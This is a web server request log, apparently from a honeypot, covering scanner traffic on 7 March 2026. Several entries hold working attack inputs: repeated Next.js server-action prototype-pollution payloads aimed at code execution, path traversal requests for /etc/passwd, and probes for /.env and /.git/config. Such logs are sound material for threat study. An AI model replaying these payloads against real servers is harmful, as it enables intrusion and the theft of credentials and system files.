{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 32989+true+3129968;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx103254514353
Next-Action: x
Content-Length: 517
X-Nextjs-Html-Request-Id: ilovepoop_103254514353
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 14; SM-F9560 Build/UP1A.231005.007; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/127.0.6533.103 Mobile Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx103254514353
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:42398
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-07 18:15:52] === HTTP Request ===
===================
------WebKitFormBoundaryx89584109278--
------WebKitFormBoundaryx89584109278
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx89584109278
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 39819+true+2249783;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx89584109278
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Length: 513
X-Nextjs-Html-Request-Id: ilovepoop_89584109278
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx89584109278
X-Nextjs-Request-Id: poop1234
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:42348
Path: /_next
URL: /_next
Method: POST
[2026-03-07 18:15:43] === HTTP Request ===
[2026-03-07 18:15:43] Main page accessed - IP: 195.3.221.86:52136
===================
------WebKitFormBoundaryx415315912159--
------WebKitFormBoundaryx415315912159
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx415315912159
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 266917+true+1555974;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx415315912159
X-Nextjs-Html-Request-Id: ilovepoop_415315912159
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 14; SM-F9560 Build/UP1A.231005.007; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/127.0.6533.103 Mobile Safari/537.36
Connection: close
Content-Length: 518
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx415315912159
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:52136
Path: /
URL: /
Method: POST
[2026-03-07 18:15:43] === HTTP Request ===
[2026-03-07 18:15:40] Main page accessed - IP: 195.3.221.86:52108
===================
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:52108
Path: /
URL: /
Method: GET
[2026-03-07 18:15:40] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.131:58284
Path: /wiki
URL: /wiki
Method: GET
[2026-03-07 15:50:46] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.131:9720
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-07 15:48:43] === HTTP Request ===
===================
Protocol: HTTP/2.0
Host:
RemoteAddr: 66.132.153.131:9718
Path: *
URL: *
Method: PRI
[2026-03-07 15:48:42] === HTTP Request ===
[2026-03-07 15:48:42] Main page accessed - IP: 66.132.153.131:9702
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.131:9702
Path: /
URL: /
Method: GET
[2026-03-07 15:48:42] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 167.94.138.120
Via: 1.1 Caddy
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:37462
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-07 14:42:30] === HTTP Request ===
[2026-03-07 14:42:28] Main page accessed - IP: 172.30.0.12:37462
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 167.94.138.120
Via: 1.1 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:37462
Path: /
URL: /
Method: GET
[2026-03-07 14:42:28] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.864.0 Safari/535.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 103.141.60.30:42160
Path: /login.rsp
URL: /login.rsp
Method: GET
[2026-03-07 13:22:11] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (X11; CrOS i686 1193.158.0) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 103.141.60.30:42146
Path: /streamer/
URL: /streamer/
Method: GET
[2026-03-07 13:22:10] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.77 Safari/535.7ad-imcjapan-syosyaman-xkgi3lqg03!wgz
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 103.141.60.30:42140
Path: /v2/
URL: /v2/
Method: GET
[2026-03-07 13:22:09] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 103.141.60.30:42136
Path: /.git/config
URL: /.git/config
Method: GET
[2026-03-07 13:22:08] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.22 (KHTML, like Gecko) Chrome/19.0.1047.0 Safari/535.22
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 103.141.60.30:42134
Path: /supershell/login/
URL: /supershell/login/
Method: GET
[2026-03-07 13:22:07] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.77 Safari/535.7ad-imcjapan-syosyaman-xkgi3lqg03!wgz
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 103.141.60.30:36344
Path: /.env
URL: /.env
Method: GET
[2026-03-07 13:22:06] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 103.141.60.30:36332
Path: /resources/favicon.ico
URL: /resources/favicon.ico
Method: GET
[2026-03-07 13:22:05] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 103.141.60.30:36328
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-07 13:22:03] === HTTP Request ===
[2026-03-07 13:22:02] Main page accessed - IP: 103.141.60.30:36320
===================
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 103.141.60.30:36320
Path: /
URL: /
Method: GET
[2026-03-07 13:22:02] === HTTP Request ===
===================
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Accept-Language: en US,en;q=0.9,sv;q=0.8
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate, gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.61.209.96:16646
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-03-07 13:19:43] === HTTP Request ===
[2026-03-07 12:50:02] Main page accessed - IP: 89.110.97.157:48916
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 89.110.97.157:48916
Path: /
URL: /
Method: GET
[2026-03-07 12:50:02] === HTTP Request ===
===================
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: google.com:443
RemoteAddr: 176.65.149.215:43470
Path:
URL: //google.com:443
Method: CONNECT
[2026-03-07 12:33:48] === HTTP Request ===
[2026-03-07 12:18:52] Main page accessed - IP: 34.76.34.183:53928
===================
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.76.34.183:53928
Path: /
URL: /
Method: GET
[2026-03-07 12:18:52] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 89.42.231.182:41504
Path: /static/link/../../etc/passwd
URL: /static/link/%2e%2e/%2e%2e/etc/passwd
Method: GET
[2026-03-07 12:08:12] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 89.42.231.182:41490
Path: /../../../../../../../../etc/passwd
URL: /%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
Method: GET
[2026-03-07 12:08:12] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 89.42.231.182:41486
Path: /../../../../../../etc/passwd
URL: /..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Method: GET
[2026-03-07 12:08:12] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:42024
Path: /jars
URL: /jars
Method: GET
[2026-03-07 11:58:59] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 87.121.84.57:50660
Path: /cgi-bin/luci/;stok=/locale
URL: /cgi-bin/luci/;stok=/locale
Method: GET
[2026-03-07 11:45:28] === HTTP Request ===
[2026-03-07 10:47:15] Main page accessed - IP: 34.62.151.62:47230
===================
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.62.151.62:47230
Path: /
URL: /
Method: GET
[2026-03-07 10:47:15] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.73:37152
Path: /../../../../../../../../etc/passwd
URL: /%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
Method: GET
[2026-03-07 10:15:08] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.73:37136
Path: /../../../../../../etc/passwd
URL: /..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Method: GET
[2026-03-07 10:15:08] === HTTP Request ===
[2026-03-07 09:38:43] Main page accessed - IP: 34.62.151.62:47156
===================
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.62.151.62:47156
Path: /
URL: /
Method: GET
[2026-03-07 09:38:43] === HTTP Request ===
[2026-03-07 08:44:08] Main page accessed - IP: 176.65.149.45:55938
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:55938
Path: /
URL: /
Method: GET
[2026-03-07 08:44:08] === HTTP Request ===
===================
------WebKitFormBoundaryx557609202469--
------WebKitFormBoundaryx557609202469
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx557609202469
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 76446+true+7294158;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx557609202469
Content-Length: 517
X-Nextjs-Html-Request-Id: ilovepoop_557609202469
Next-Action: x
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx557609202469
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:56608
Path: /api/route
URL: /api/route
Method: POST
[2026-03-07 08:10:22] === HTTP Request ===
===================
------WebKitFormBoundaryx80215205377--
------WebKitFormBoundaryx80215205377
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx80215205377
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 37504+true+2138844;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx80215205377
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 513
X-Nextjs-Request-Id: poop1234
X-Nextjs-Html-Request-Id: ilovepoop_80215205377
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx80215205377
Next-Action: x
User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.135 Mobile Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:56606
Path: /app
URL: /app
Method: POST
[2026-03-07 08:10:22] === HTTP Request ===
===================
------WebKitFormBoundaryx442964872351--
------WebKitFormBoundaryx442964872351
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx442964872351
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 324558+true+1364825;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx442964872351
Next-Action: x
Accept-Encoding: gzip, deflate
X-Nextjs-Html-Request-Id: ilovepoop_442964872351
X-Nextjs-Request-Id: poop1234
Content-Length: 518
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx442964872351
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:56602
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-07 08:10:22] === HTTP Request ===
===================
------WebKitFormBoundaryx1011994925809--
------WebKitFormBoundaryx1011994925809
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1011994925809
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 177799+true+5691792;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1011994925809
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_1011994925809
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1011994925809
Next-Action: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.
Content-Length: 522
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:38670
Path: /api
URL: /api
Method: POST
[2026-03-07 08:10:21] === HTTP Request ===
===================
------WebKitFormBoundaryx677216452125--
------WebKitFormBoundaryx677216452125
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx677216452125
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 121741+true+5562764;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx677216452125
Content-Length: 518
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx677216452125
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
X-Nextjs-Html-Request-Id: ilovepoop_677216452125
Next-Action: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:38662
Path: /_next
URL: /_next
Method: POST
[2026-03-07 08:10:20] === HTTP Request ===
[2026-03-07 08:10:18] Main page accessed - IP: 195.3.221.86:38654
===================
------WebKitFormBoundaryx549387444529--
------WebKitFormBoundaryx549387444529
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx549387444529
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 169299+true+3245072;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx549387444529
Next-Action: x
Content-Length: 518
X-Nextjs-Html-Request-Id: ilovepoop_549387444529
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx549387444529
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.135 Mobile Safari/537.36
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:38654
Path: /
URL: /
Method: POST
[2026-03-07 08:10:18] === HTTP Request ===
[2026-03-07 08:10:17] Main page accessed - IP: 195.3.221.86:38640
===================
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:38640
Path: /
URL: /
Method: GET
[2026-03-07 08:10:17] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:46070
Path: /jars
URL: /jars
Method: GET
[2026-03-07 05:00:57] === HTTP Request ===
[2026-03-07 04:16:11] Main page accessed - IP: 172.236.127.133:35570
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 172.236.127.133:35570
Path: /
URL: /
Method: GET
[2026-03-07 04:16:11] === HTTP Request ===
[2026-03-07 03:49:50] Main page accessed - IP: 147.185.132.70:53610
===================
Accept: */*
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 147.185.132.70:53610
Path: /
URL: /
Method: GET
[2026-03-07 03:49:50] === HTTP Request ===
===================
Proxy-Connection: Keep-Alive
Pragma: no-cache
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Cache-Control: no-cache
Headers:
Protocol: HTTP/1.1
Host: www.shadowserver.org:443
RemoteAddr: 64.62.156.146:19153
Path:
URL: //www.shadowserver.org:443
Method: CONNECT
[2026-03-07 03:29:24] === HTTP Request ===
[2026-03-07 03:29:10] Main page accessed - IP: 64.62.156.147:58917
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: api.ipify.org
RemoteAddr: 64.62.156.147:58917
Query: format=json
Path: /
URL: http://api.ipify.org/?format=json
Method: GET
[2026-03-07 03:29:10] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 OPR/95.0.0.0 (Edition Yx 05)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.62.156.150:42791
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-07 03:28:25] === HTTP Request ===
[2026-03-07 03:27:42] Main page accessed - IP: 64.62.156.142:9702
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:140.0) Gecko/20100101 Firefox/140.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.62.156.142:9702
Path: /
URL: /
Method: GET
[2026-03-07 03:27:42] === HTTP Request ===
[2026-03-07 03:05:09] Main page accessed - IP: 147.185.132.87:61370
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 147.185.132.87:61370
Path: /
URL: /
Method: GET
[2026-03-07 03:05:09] === HTTP Request ===
===================
Accept-Language: en US,en;q=0.9,sv;q=0.8
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip, deflate, gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.61.209.96:7298
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-03-07 02:59:41] === HTTP Request ===
[2026-03-07 02:34:41] Main page accessed - IP: 137.184.32.56:41818
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 137.184.32.56:41818
Path: /
URL: /
Method: GET
[2026-03-07 02:34:41] === HTTP Request ===
===================
------WebKitFormBoundaryx112485619776--
------WebKitFormBoundaryx112485619776
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx112485619776
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 101873+true+1104175;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx112485619776
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
Accept-Encoding: gzip, deflate
Content-Length: 518
X-Nextjs-Html-Request-Id: ilovepoop_112485619776
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx112485619776
X-Nextjs-Request-Id: poop1234
Next-Action: x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:59370
Path: /api/route
URL: /api/route
Method: POST
[2026-03-07 00:56:48] === HTTP Request ===
===================
------WebKitFormBoundaryx598352400233--
------WebKitFormBoundaryx598352400233
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx598352400233
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 174413+true+3430664;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx598352400233
X-Nextjs-Request-Id: poop1234
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Content-Length: 518
X-Nextjs-Html-Request-Id: ilovepoop_598352400233
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx598352400233
Next-Action: x
Accept-Encoding: gzip, deflate
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:59364
Path: /app
URL: /app
Method: POST
[2026-03-07 00:56:47] === HTTP Request ===
===================
------WebKitFormBoundaryx168756820881--
------WebKitFormBoundaryx168756820881
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx168756820881
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 28298+true+5963560;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx168756820881
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx168756820881
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Content-Length: 517
X-Nextjs-Html-Request-Id: ilovepoop_168756820881
Next-Action: x
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
